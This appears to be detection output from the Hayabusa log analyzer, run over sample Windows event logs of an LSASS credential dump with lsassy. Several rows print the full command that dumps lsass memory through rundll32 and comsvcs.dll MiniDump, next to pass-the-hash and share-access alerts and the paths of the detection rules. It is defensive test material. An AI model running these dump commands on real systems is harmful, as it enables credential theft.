dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 14:18:56.089 +00:00,FS03.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | Cmd: ""C:\Windows\System32\rundll32.exe"" C:\Windows\System32\comsvcs.dll MiniDump 512 \Windows\Temp\76nivOxA.dmp full | Process: C:\Windows\System32\rundll32.exe | User: OFFSEC\admmig | Parent Cmd: powershell.exe -NoP -C ""C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id \Windows\Temp\76nivOxA.dmp full;Wait-Process -Id (Get-Process rundll32).id"" | LID: 0x269eec8 | PID: 2860 | PGUID: 7CF65FC7-2550-6170-9602-000000001200 | Hash: SHA1=D4AC232D507769FFD004439C15302916A40D9831,MD5=6C308D32AFA41D26CE2A0EA8F7B79565,SHA256=5CC2C563D89257964C4B446F54AFE1E57BBEE49315A9FC001FF5A6BCB6650393,IMPHASH=156B2AC675B1B9202AF35C643105610C",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 14:18:56.089 +00:00,FS03.offsec.lan,1,high,Evas | CredAccess,Process Dump via Comsvcs DLL,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_comsvcs_procdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 14:18:56.105 +00:00,FS03.offsec.lan,10,low,,Process Access,Src Process: C:\Windows\System32\rundll32.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2860 | Src PGUID: 7CF65FC7-2550-6170-9602-000000001200 | Tgt PID: 512 | Tgt PGUID: 7CF65FC7-6649-6165-0B00-000000001200,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 14:18:56.105 +00:00,FS03.offsec.lan,11,info,,File Created,Path: C:\Windows\Temp\76nivOxA.dmp | Process: C:\Windows\System32\rundll32.exe | PID: 2860 | PGUID: 7CF65FC7-2550-6170-9602-000000001200,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 14:18:56.105 +00:00,FS03.offsec.lan,10,critical,CredAccess,Lsass Memory Dump via Comsvcs DLL,,rules/sigma/process_access/proc_access_win_lsass_dump_comsvcs_dll.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 14:19:03.334 +00:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 14:19:03.334 +00:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 14:19:23.345 +00:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 14:19:23.345 +00:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 14:19:43.347 +00:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 14:19:43.347 +00:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 14:29:09.758 +00:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x26bdfac,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 14:29:09.758 +00:00,FS03.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x26bdfac,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 14:29:09.758 +00:00,FS03.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 14:29:09.773 +00:00,FS03.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x26bdfde,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 14:29:09.773 +00:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x26bdfde,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 14:29:09.836 +00:00,FS03.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x26be000,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 14:29:09.836 +00:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x26be000,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 14:29:09.898 +00:00,FS03.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x26be01f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 14:29:09.898 +00:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x26be01f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 14:29:09.961 +00:00,FS03.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x26be03c,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 14:29:09.961 +00:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x26be03c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 14:29:10.214 +00:00,FS03.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\2V7Be7Gq.dmp | IP Addr: 10.23.123.11 | LID: 0x26bdfac,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 14:29:10.214 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -NoP -C ""C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id \Windows\Temp\2V7Be7Gq.dmp full;Wait-Process -Id (Get-Process rundll32).id"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x998 | User: FS03$ | LID: 0x3e4",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 14:29:10.214 +00:00,FS03.offsec.lan,4688,high,Exec,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 14:29:10.214 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 14:29:10.214 +00:00,FS03.offsec.lan,4688,high,CredAccess,PowerShell Get-Process LSASS,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_getprocess_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 14:29:10.214 +00:00,FS03.offsec.lan,4688,high,CredAccess,LSASS Memory Dumping,,rules/sigma/process_creation_builtin/proc_creation_win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 14:29:10.214 +00:00,FS03.offsec.lan,5145,medium,Collect,Suspicious Access to Sensitive File Extensions,,rules/sigma/builtin/security/win_susp_raccess_sensitive_fext.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 14:29:10.526 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\rundll32.exe"" C:\Windows\System32\comsvcs.dll MiniDump 512 \Windows\Temp\2V7Be7Gq.dmp full | Path: C:\Windows\System32\rundll32.exe | PID: 0xff8 | User: admmig | LID: 0x26be03c",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 14:29:10.526 +00:00,FS03.offsec.lan,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 14:29:10.526 +00:00,FS03.offsec.lan,4688,high,Evas | CredAccess,Process Dump via Comsvcs DLL,,rules/sigma/process_creation_builtin/proc_creation_win_susp_comsvcs_procdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 14:29:10.542 +00:00,FS03.offsec.lan,4656,critical,CredAccess,LSASS Access from Non System Account,,rules/sigma/builtin/security/win_lsass_access_non_system_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 14:29:10.542 +00:00,FS03.offsec.lan,4656,high,CredAccess,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 14:29:10.542 +00:00,FS03.offsec.lan,4663,high,CredAccess,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 14:29:10.542 +00:00,FS03.offsec.lan,4663,high,CredAccess,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 14:29:11.230 +00:00,FS03.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\2V7Be7Gq.dmp | IP Addr: 10.23.123.11 | LID: 0x26bdfac,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 14:29:11.230 +00:00,FS03.offsec.lan,5145,medium,Collect,Suspicious Access to Sensitive File Extensions,,rules/sigma/builtin/security/win_susp_raccess_sensitive_fext.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 14:29:12.553 +00:00,FS03.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\2V7Be7Gq.dmp | IP Addr: 10.23.123.11 | LID: 0x26bdfac,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 14:29:12.553 +00:00,FS03.offsec.lan,5145,medium,Collect,Suspicious Access to Sensitive File Extensions,,rules/sigma/builtin/security/win_susp_raccess_sensitive_fext.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 14:29:13.725 +00:00,FS03.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Sysmon\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x262bb6b,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 14:29:22.291 +00:00,FS03.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Sysmon\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x262bb6b,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 14:39:26.224 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"""PS $($executionContext.SessionState.Path.CurrentLocation)$('>' * ($nestedPromptLevel + 1)) "" # .Link # http://go.microsoft.com/fwlink/?LinkID=225750 # .ExternalHelp System.Management.Automation.dll-help.xml",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.240 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"<# Options include: RelativeFilePaths - [bool] Always resolve file paths using Resolve-Path -Relative. The default is to use some heuristics to guess if relative or absolute is better. To customize your own custom options, pass a hashtable to CompleteInput, e.g. return [System.Management.Automation.CommandCompletion]::CompleteInput($inputScript, $cursorColumn, @{ RelativeFilePaths=$false } #> [CmdletBinding(DefaultParameterSetName = 'ScriptInputSet')] Param( [Parameter(ParameterSetName = 'ScriptInputSet', Mandatory = $true, Position = 0)] [string] $inputScript, [Parameter(ParameterSetName = 'ScriptInputSet', Mandatory = $true, Position = 1)] [int] $cursorColumn, [Parameter(ParameterSetName = 'AstInputSet', Mandatory = $true, Position = 0)] [System.Management.Automation.Language.Ast] $ast, [Parameter(ParameterSetName = 'AstInputSet', Mandatory = $true, Position = 1)] [System.Management.Automation.Language.Token[]] $tokens, [Parameter(ParameterSetName = 'AstInputSet', Mandatory = $true, Position = 2)] [System.Management.Automation.Language.IScriptPosition] $positionOfCursor, [Parameter(ParameterSetName = 'ScriptInputSet', Position = 2)] [Parameter(ParameterSetName = 'AstInputSet', Position = 3)] [Hashtable] $options = $null ) End { if ($psCmdlet.ParameterSetName -eq 'ScriptInputSet') { return [System.Management.Automation.CommandCompletion]::CompleteInput( <#inputScript#> $inputScript, <#cursorColumn#> $cursorColumn, <#options#> $options) } else { return [System.Management.Automation.CommandCompletion]::CompleteInput( <#ast#> $ast, <#tokens#> $tokens, <#positionOfCursor#> $positionOfCursor, <#options#> $options) } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.240 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"$space = New-Object System.Management.Automation.Host.BufferCell $space.Character = ' ' $space.ForegroundColor = $host.ui.rawui.ForegroundColor $space.BackgroundColor = $host.ui.rawui.BackgroundColor $rect = New-Object System.Management.Automation.Host.Rectangle $rect.Top = $rect.Bottom = $rect.Right = $rect.Left = -1 $origin = New-Object System.Management.Automation.Host.Coordinates $Host.UI.RawUI.CursorPosition = $origin $Host.UI.RawUI.SetBufferContents($rect, $space) # .Link # http://go.microsoft.com/fwlink/?LinkID=225747 # .ExternalHelp System.Management.Automation.dll-help.xml",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.240 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param([string[]]$paths) $OutputEncoding = [System.Console]::OutputEncoding if($paths) { foreach ($file in $paths) { Get-Content $file | more.com } } else { $input | more.com },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.255 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"<# .FORWARDHELPTARGETNAME Get-Help .FORWARDHELPCATEGORY Cmdlet #> [CmdletBinding(DefaultParameterSetName='AllUsersView', HelpUri='http://go.microsoft.com/fwlink/?LinkID=113316')] param( [Parameter(Position=0, ValueFromPipelineByPropertyName=$true)] [string] ${Name}, [string] ${Path}, [ValidateSet('Alias','Cmdlet','Provider','General','FAQ','Glossary','HelpFile','ScriptCommand','Function','Filter','ExternalScript','All','DefaultHelp','Workflow')] [string[]] ${Category}, [string[]] ${Component}, [string[]] ${Functionality}, [string[]] ${Role}, [Parameter(ParameterSetName='DetailedView', Mandatory=$true)] [switch] ${Detailed}, [Parameter(ParameterSetName='AllUsersView')] [switch] ${Full}, [Parameter(ParameterSetName='Examples', Mandatory=$true)] [switch] ${Examples}, [Parameter(ParameterSetName='Parameters', Mandatory=$true)] [string] ${Parameter}, [Parameter(ParameterSetName='Online', Mandatory=$true)] [switch] ${Online}, [Parameter(ParameterSetName='ShowWindow', Mandatory=$true)] [switch] ${ShowWindow}) #Set the outputencoding to Console::OutputEncoding. More.com doesn't work well with Unicode. $outputEncoding=[System.Console]::OutputEncoding Get-Help @PSBoundParameters | more",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.255 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"<# .FORWARDHELPTARGETNAME New-Item .FORWARDHELPCATEGORY Cmdlet #> [CmdletBinding(DefaultParameterSetName='pathSet', SupportsShouldProcess=$true, SupportsTransactions=$true, ConfirmImpact='Medium')] [OutputType([System.IO.DirectoryInfo])] param( [Parameter(ParameterSetName='nameSet', Position=0, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='pathSet', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [System.String[]] ${Path}, [Parameter(ParameterSetName='nameSet', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [AllowNull()] [AllowEmptyString()] [System.String] ${Name}, [Parameter(ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true)] [System.Object] ${Value}, [Switch] ${Force}, [Parameter(ValueFromPipelineByPropertyName=$true)] [System.Management.Automation.PSCredential] ${Credential} ) begin { try { $wrappedCmd = $ExecutionContext.InvokeCommand.GetCommand('New-Item', [System.Management.Automation.CommandTypes]::Cmdlet) $scriptCmd = {& $wrappedCmd -Type Directory @PSBoundParameters } $steppablePipeline = $scriptCmd.GetSteppablePipeline() $steppablePipeline.Begin($PSCmdlet) } catch { throw } } process { try { $steppablePipeline.Process($_) } catch { throw } } end { try { $steppablePipeline.End() } catch { throw } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.255 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"param( [Parameter(ValueFromPipeline=$true)] [string[]] $verb = '*' ) begin { $allVerbs = [PSObject].Assembly.GetTypes() | Where-Object {$_.Name -match '^Verbs.'} | Get-Member -type Properties -static | Select-Object @{ Name='Verb' Expression = {$_.Name} }, @{ Name='Group' Expression = { $str = ""$($_.TypeName)"" $str.Substring($str.LastIndexOf('Verbs') + 5) } } } process { foreach ($v in $verb) { $allVerbs | Where-Object { $_.Verb -like $v } } } # .Link # http://go.microsoft.com/fwlink/?LinkID=160712 # .ExternalHelp System.Management.Automation.dll-help.xml",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.255 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"[CmdletBinding()] param( [ValidateRange(2, 2147483647)] [int] ${Width}, [Parameter(ValueFromPipeline=$true)] [psobject] ${InputObject}) begin { try { $PSBoundParameters['Stream'] = $true $wrappedCmd = $ExecutionContext.InvokeCommand.GetCommand('Out-String',[System.Management.Automation.CommandTypes]::Cmdlet) $scriptCmd = {& $wrappedCmd @PSBoundParameters } $steppablePipeline = $scriptCmd.GetSteppablePipeline($myInvocation.CommandOrigin) $steppablePipeline.Begin($PSCmdlet) } catch { throw } } process { try { $steppablePipeline.Process($_) } catch { throw } } end { try { $steppablePipeline.End() } catch { throw } } <# .ForwardHelpTargetName Out-String .ForwardHelpCategory Cmdlet #>",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.255 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location A:,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.255 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location B:,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.255 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location C:,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.255 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location D:,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.255 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location E:,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.255 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location F:,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 14:39:26.255 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location 